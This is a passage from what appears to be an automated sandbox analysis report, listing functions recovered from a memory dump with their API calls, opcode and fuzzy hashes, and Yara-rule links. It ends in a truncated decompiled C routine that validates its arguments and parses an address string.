                                                                                                                            • Instruction Fuzzy Hash: B7C08C701519807AFB0E4B18CE25B2036A4AB1C70EF8402DDAA01094A2C36CB843C218
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1DAD30, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.1105(?,00000000,00000001,?,6B2002E9,00000000,?,6B1EECFB,6B2C84D8,6B2C84D8,6B2217F0,00000000,?,6B1FF715,6B1FF5C0,?), ref: 6B1DAD43
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                            • Instruction ID: 9f7f31c2ef08f388904479cb7b95672666473248cd954252705e44619417001b
                                                                                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                            • Instruction Fuzzy Hash: E2C08C32080248BBCB125A45CD01F017B6DE790B60F000021B6040A6618A36E862D588
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B204190, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
                                                                                                                            • Instruction ID: dbb93051c530b8b0c590db6c59642a145a6478ae531f9912773afaa981ab0747
                                                                                                                            • Opcode Fuzzy Hash: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
                                                                                                                            • Instruction Fuzzy Hash: BCC04C357115418FCF16CF29C2C4F4537F4B744745F1508D0E805DBB21D728E800CA10
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B202ACB, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLeaveCriticalSection.1105(?,6B202A64,00000001,?,?,?,?,?,?,?,00000000,0000000E,00000000), ref: 6B202AD4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLeaveSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3988221542-0
                                                                                                                            • Opcode ID: c9d563982e39afb072f032817bed47142bc00bafb50cbb0533e5a32ff18e91e9
                                                                                                                            • Instruction ID: 5439b474d540e73cdc0c1d5706ee6aff248c48920a8228df6e23a035d1700108
                                                                                                                            • Opcode Fuzzy Hash: c9d563982e39afb072f032817bed47142bc00bafb50cbb0533e5a32ff18e91e9
                                                                                                                            • Instruction Fuzzy Hash: 8BB01233C60840DFCF42DF50C610B197331FB00750F094490900127930C32CAD02CB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B264320, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLeaveCriticalSection.1105(?,6B26431A,?,6B2B08D0,00000008,6B209B80,?,?,?,?,6B1EED2D,-00000F38,6B2C84D8,6B2C84D8,6B2217F0,00000000), ref: 6B264329
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLeaveSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3988221542-0
                                                                                                                            • Opcode ID: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
                                                                                                                            • Instruction ID: 2f28719d9baa981d62ab1c4b8e41a3b1b4bceaa2b3691f236fd76388f8c9c9fe
                                                                                                                            • Opcode Fuzzy Hash: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
                                                                                                                            • Instruction Fuzzy Hash: 7CA022330B0C80EFCB83AF20CA20F003330FB00A00FC808A0A00203C30832CCA02CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B264248, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlLeaveCriticalSection.1105(?,6B264242,?,6B2B08F0,00000008,6B26426A,6B2B08D0,00000008,6B209B80,?,?,?,?,6B1EED2D,-00000F38,6B2C84D8), ref: 6B264251
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLeaveSection
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3988221542-0
                                                                                                                            • Opcode ID: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
                                                                                                                            • Instruction ID: 2f28719d9baa981d62ab1c4b8e41a3b1b4bceaa2b3691f236fd76388f8c9c9fe
                                                                                                                            • Opcode Fuzzy Hash: f70edb36b298999dcef8c5e05368ba9f0d7253c31339d10b6596c82cb1753443
                                                                                                                            • Instruction Fuzzy Hash: 7CA022330B0C80EFCB83AF20CA20F003330FB00A00FC808A0A00203C30832CCA02CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B202AE4, Relevance: 1.4, APIs: 1, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.1105(00000000,0000000F,?,00000000,C0000100,?,?,?,?,?,00000000,0000000E,00000000), ref: 6B202BEC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3510742995-0
                                                                                                                            • Opcode ID: f2e88acf2968c7d3d4f2e8b36ee0eb90d6bf79d210120b7f21d5a88e5cfa2a00
                                                                                                                            • Instruction ID: 4f4dbc618e21517e3668a02b7dca2c67ea5c909306c4d315f899a62298a8a3c0
                                                                                                                            • Opcode Fuzzy Hash: f2e88acf2968c7d3d4f2e8b36ee0eb90d6bf79d210120b7f21d5a88e5cfa2a00
                                                                                                                            • Instruction Fuzzy Hash: 5651B1B6A001298FCB15CF1DC4C0AADB7F1FB89700716855FE855AB358EB38AA41DB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Actx
                                                                                                                            • API String ID: 0-89312691
                                                                                                                            • Opcode ID: 368114bf5eda018605f4d80af0726bb8008053d0ef293ce1e807b79e4c25c3a5
                                                                                                                            • Instruction ID: 129aaf8983d6626ed13310461a05ae3d7a5a46b0dbefa5cba51fc939fd793fb6
                                                                                                                            • Opcode Fuzzy Hash: 368114bf5eda018605f4d80af0726bb8008053d0ef293ce1e807b79e4c25c3a5
                                                                                                                            • Instruction Fuzzy Hash: CF11907574A642ABEF144E1D8490B19F3DDABA6B15F25476AD470DB390DAECD802C340
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D58EC, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: S,k
                                                                                                                            • API String ID: 0-215823285
                                                                                                                            • Opcode ID: b077448f3ea314da6f1070424a57fa117cb7ff4c9e956cb8c9a4b6eea114aa0f
                                                                                                                            • Instruction ID: 7d992ccc7549b029ad3b5a76482462c0ad801e42b74366b15eacecf3068033b9
                                                                                                                            • Opcode Fuzzy Hash: b077448f3ea314da6f1070424a57fa117cb7ff4c9e956cb8c9a4b6eea114aa0f
                                                                                                                            • Instruction Fuzzy Hash: 2101F771640108ABDB08CB39CC82AAFB7E9EF45270F8100A9DA04AB248DF38DD02C651
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4B94, Relevance: .1, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be039c21412206f03258b38c48bd730f8b7be0bbe1998d3b1572028778da135b
                                                                                                                            • Instruction ID: c409ea42eeb88080e5ca26f186af338de4678148ba98f04135f4bfad17ff6443
                                                                                                                            • Opcode Fuzzy Hash: be039c21412206f03258b38c48bd730f8b7be0bbe1998d3b1572028778da135b
                                                                                                                            • Instruction Fuzzy Hash: 4D310271A00A25EFCB14CF64C480B79F3F4FF49716F5186AAC86997660E778B940CB80
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B206B90, Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                                                                            • Instruction ID: 519619b641c7a257d0f8d29e4278be7b633a0f85dc48584d6c5db87514298b30
                                                                                                                            • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                                                                                                                            • Instruction Fuzzy Hash: A2F049B5A0420EDFDB1ACE88C6D0BACB7F5EB44311F2040A8E516AB744DA799E80DB40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FC577, Relevance: .0, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 53bba21cc2323f1f2ee938db248e7639f8dc03628732353353ac9164ef7dfa61
                                                                                                                            • Instruction ID: 389ad85b0e9bb401bda231a271d837956e5359c875252d793e9b9d77e58b014e
                                                                                                                            • Opcode Fuzzy Hash: 53bba21cc2323f1f2ee938db248e7639f8dc03628732353353ac9164ef7dfa61
                                                                                                                            • Instruction Fuzzy Hash: 58F090B2F19AA4BFD311C768C040B017BEC9B17771F4945A7D41587122C7ACD882EA50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B292073, Relevance: .0, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionInformationPrintProcessQueryRaiseUniform
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3936843822-0
                                                                                                                            • Opcode ID: 603ad59c3684bbb02f96a7bccf41b252bcd0d8855738583f07827f318a5e359e
                                                                                                                            • Instruction ID: da28f628567f8be26ee4ba0a1113a01ec7d9b0bdf4fc14bf635fba87482a4d2c
                                                                                                                            • Opcode Fuzzy Hash: 603ad59c3684bbb02f96a7bccf41b252bcd0d8855738583f07827f318a5e359e
                                                                                                                            • Instruction Fuzzy Hash: FDF027BA81529D8BEE626F37308A2E23BD5DB56215B1954C1D4681B280C73DC88BCA21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D4F2E, Relevance: .0, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: abf7902ceaaa847b598bcb39395a8c6e181b3a3fcf4b51c0cd10cdad8242236f
                                                                                                                            • Instruction ID: 99cecc32d234e5bf04e8d03bcb1aa142c068d7fcd8c7339f24698a1d29124db9
                                                                                                                            • Opcode Fuzzy Hash: abf7902ceaaa847b598bcb39395a8c6e181b3a3fcf4b51c0cd10cdad8242236f
                                                                                                                            • Instruction Fuzzy Hash: A2F0BEB2D296EE9FD350C728C1C0B03B7EBAB057B9F0144A5D405879A4C73CEC40C664
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D354C, Relevance: .0, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 58c52740fe88fb0865ce4df6d2b1698be8fb571b78e8eeb22477e52e9259573f
                                                                                                                            • Instruction ID: d7bde5b6cf5d48f141a08a43c4d5955587be6a7741df3b83602d3c6b4ec55a6b
                                                                                                                            • Opcode Fuzzy Hash: 58c52740fe88fb0865ce4df6d2b1698be8fb571b78e8eeb22477e52e9259573f
                                                                                                                            • Instruction Fuzzy Hash: 61F0A731D1969E9FE312C728C184F03B7E89B06772F2245A5E804C7992CB3CDC81C650
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1FE760, Relevance: .0, Instructions: 28COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d5e06579ee81064a93e4f70ce2a8d4bf73986fae91dad655c411b26d876d4e76
                                                                                                                            • Instruction ID: 8c3481067849e9ab193c626bb947d6d8e70989f95ecd98c5ca9c5a6569013254
                                                                                                                            • Opcode Fuzzy Hash: d5e06579ee81064a93e4f70ce2a8d4bf73986fae91dad655c411b26d876d4e76
                                                                                                                            • Instruction Fuzzy Hash: 8FF0A032A68299EFE319DF28D181B11B7E8AB05772F0154A5D8158B9A1CB7DDC90C260
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B203E70, Relevance: .0, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap$HeaderImage
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2000052644-0
                                                                                                                            • Opcode ID: 52c1a01be517ef78f1b4aedf4d3818d09d37ef6852fa5bb60b9eb1c718891785
                                                                                                                            • Instruction ID: 2a5d61ad73de26eca5c078370854063b088a65e801b69fac401eb99c82f7c0cb
                                                                                                                            • Opcode Fuzzy Hash: 52c1a01be517ef78f1b4aedf4d3818d09d37ef6852fa5bb60b9eb1c718891785
                                                                                                                            • Instruction Fuzzy Hash: 43E08C31E1438C9FE720AA2980C8F1577E57F99B25F148156A4084B550CF3CD882CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1EAAB0, Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                            • Instruction ID: 1aef29379002bdd5fc9f3200add4122715a64d6c93e048c5d2523f980ffe657c
                                                                                                                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                            • Instruction Fuzzy Hash: A4D0C935352E80CFD706CB08C594B0533B4FB44B41FC104E0E500CB761E62CD940CA00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B288D47, Relevance: .0, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                            • Instruction ID: 471603ef4057d0419368e8e27bbfa97914a1ff5503a31ba0e5b4890d327d5046
                                                                                                                            • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                            • Instruction Fuzzy Hash: D3C08C1E0192C909CD138F3042123C0BFA0C7029C0F0800C1C0C11F152C01805038625
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1F7D50, Relevance: .0, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, Offset: 6B1B0000, based on PE: true
                                                                                                                            • Associated: 0000001E.00000002.435586569.000000006B1B0000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440226488.000000006B2C5000.00000008.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440284197.000000006B2CB000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 0000001E.00000002.440335568.000000006B2CF000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                            • Instruction ID: 026876ad6d336f51d9f4a093d0b1eede512eef31a8ff0c5d0551c8e5f17bc02e
                                                                                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                            • Instruction Fuzzy Hash: 72B092343029409FCE06DF18C180B0533F8BB84B40B8400D0E400CBA20D229E800C900
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 6B1D6CA0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 243COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E6B1D6CA0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, short* _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed short _t58;
				signed short _t59;
				void* _t60;
				signed short _t61;
				signed short _t62;
				signed short _t63;
				signed short _t69;
				signed short _t73;
				signed short _t74;
				signed short _t75;
				signed int _t82;
				intOrPtr _t83;
				signed short _t84;
				signed short _t86;
				signed short _t87;
				signed int _t88;
				void* _t92;
				signed int _t97;
				short _t98;
				signed short _t99;
				signed short _t101;
				signed short _t102;
				char _t103;
				void* _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				signed int _t118;
				intOrPtr* _t122;
				void* _t123;
				void* _t125;
				signed int _t127;
				signed int _t129;
				signed int _t130;
				signed short _t134;
				signed int _t136;
				intOrPtr* _t139;
				void* _t146;

				_t51 = _a4;
				if(_t51 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L6:
					_t52 = 0xc000000d;
				} else {
					_t103 =  *_t51;
					_t97 = 0;
					_v12 = 0;
					_v20 = 0;
					_v5 = _t103;
					_t146 = _t103 - 0x5b;
					if(_t146 == 0) {
						_t51 = _t51 + 1;
						__eflags = _t103 - 0x5b;
					}
					_v6 = _t146 == 0;
					if(E6B1D6D10(_t51,  &_v16, _a8) >= 0) {
						_t139 = _v16;
						_t54 = 0xa;
